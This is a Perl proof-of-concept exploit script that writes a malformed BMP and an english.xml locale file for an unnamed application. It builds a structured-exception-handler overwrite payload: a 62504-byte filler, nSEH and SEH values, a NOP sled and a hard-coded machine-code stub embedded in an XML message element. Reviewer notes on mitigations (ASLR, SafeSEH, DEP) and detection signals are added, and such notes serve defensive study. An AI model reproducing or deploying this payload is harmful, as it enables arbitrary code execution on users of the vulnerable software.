#!/usr/bin/perl
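# Write $buffer to $file as raw bytes, then report the file name and the
# buffer length on STDOUT.
#
# Arguments:
#   $file   - path of the file to create (an existing file is truncated)
#   $buffer - byte string to write
#
# Dies if the file cannot be opened, written or closed, so the "created"
# message is never printed for a file that was not actually written.
sub write_file {
    my ($file, $buffer) = @_;

    # Three-argument open with a lexical handle. The two-argument form
    # open(FILE, ">$file") lets characters in the file name alter the open
    # mode, and the bareword handle FILE is a package global.
    open(my $fh, '>', $file)
        or die "Cannot open $file for writing: $!\n";

    # The buffers written by this script are binary; disable any newline
    # translation the platform's text layer would otherwise apply.
    binmode($fh);

    print {$fh} $buffer
        or die "Cannot write to $file: $!\n";

    # Buffered write errors surface at close, so check it as well.
    close($fh)
        or die "Cannot close $file: $!\n";

    print "Exploit file [" . $file . "] created\n";
    print "Buffer size: " . length($buffer) . "\n";
}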
# Return the fixed 54-byte header this script puts at the start of
# corrupt.bmp: a 14-byte file header followed by a 40-byte info header,
# every multi-byte field little-endian. Takes no arguments.
#
# Field names follow the standard BMP layout. The size field declares a
# 70-byte file regardless of how much data the caller appends.
sub bmp_header {
    # Each entry is [ pack template, value ].
    # 'a2' = two raw bytes, 'V' = 32-bit LE, 'v' = 16-bit LE.
    my @fields = (
        [ 'a2', 'BM' ],    # signature
        [ 'V',  70   ],    # declared file size (0x46)
        [ 'V',  0    ],    # reserved
        [ 'V',  54   ],    # offset of pixel data (0x36)
        [ 'V',  40   ],    # info header size (0x28)
        [ 'V',  2    ],    # width
        [ 'V',  2    ],    # height
        [ 'v',  1    ],    # colour planes
        [ 'v',  24   ],    # bits per pixel (0x18)
        [ 'V',  0    ],    # compression
        [ 'V',  16   ],    # declared image data size (0x10)
        [ 'V',  2835 ],    # horizontal resolution (0x0b13)
        [ 'V',  2835 ],    # vertical resolution (0x0b13)
        [ 'V',  0    ],    # colours in palette
        [ 'V',  0    ],    # important colours
    );

    my $template = join ' ', map { $_->[0] } @fields;
    my @values   = map { $_->[1] } @fields;

    return pack($template, @values);
}
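# Build the two proof-of-concept input files. Everything below is fixed
# data; nothing depends on user input or on the environment. The target
# application is not identified anywhere in this file.

# ---- File 1: corrupt.bmp ------------------------------------------------
# The header from bmp_header() padded with 0x41 bytes to exactly 5000
# bytes. The header declares a 70-byte file, so declared and actual size
# disagree.
# NOTE(review): presumably that mismatch is what makes the parsing
# application look up the "LengthAndFilesizeDoNotMatch" message from the
# locale file built below -- this file does not say so; confirm.
my $header = bmp_header();
my $data   = "\x41" x (5000 - length($header));
my $buffer = $header . $data;
write_file("corrupt.bmp", $buffer);

# ---- File 2: english.xml ------------------------------------------------
# A locale file whose single <message> element carries a 100000-byte body
# instead of a short warning string. Layout of that body, in bytes:
#
#   62504  0x41 filler                      ($junk)
#   4 + 4  $nseh followed by $seh
#   12     0x41 filler                      ($junk2)
#   4 + 4  $nseh followed by $seh again
#   100    0x90 bytes                       ($nops)
#   16     fixed machine-code stub          ($shell)
#   rest   0x43 fill up to $buffsize        ($fill)
#
# Defender notes:
#  * The variable names ($nseh, $seh) indicate a structured-exception-
#    handler overwrite. $seh and the addresses embedded in $shell are
#    hard-coded absolute values, so the file is tied to one specific
#    module / OS build; ASLR, SafeSEH, SEHOP and DEP are the mitigations
#    aimed at this class of bug.
#  * A message element tens of kilobytes long, mostly one repeated byte,
#    in a locale XML file is a simple detection signal in its own right.
#  * The root cause sits in the consumer, which evidently copies the
#    message text without a length check; bounding that copy is the fix.
my $buffsize = 100000;

my $junk  = "\x41" x 62504;
my $nseh  = "\xeb\x32\x90\x90";
my $seh   = pack('V', 0x74c82f4f);
my $junk2 = "\x41" x 12;
my $nops  = "\x90" x 100;
my $shell = join '',
    "\xb9\x7c\xec\xa5\x7c",
    "\x31\xc0",
    "\xbb\xb2\x1b\x86\x7c",
    "\x51",
    "\x50",
    "\xff\xd3";

my $sploit = join '',
    $junk, $nseh, $seh, $junk2, $nseh, $seh, $nops, $shell;

# Pad the message body out to exactly $buffsize bytes.
my $fill = "\x43" x ($buffsize - length($sploit));
$sploit .= $fill;

my $xml = join '',
    '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">',
    $sploit,
    '</message></warning></image></corrupt></exception></locale>';

# Reuse the existing $buffer. The original declared it a second time with
# "my", which masks the earlier declaration in the same scope.
$buffer = $xml;
write_file("english.xml", $buffer);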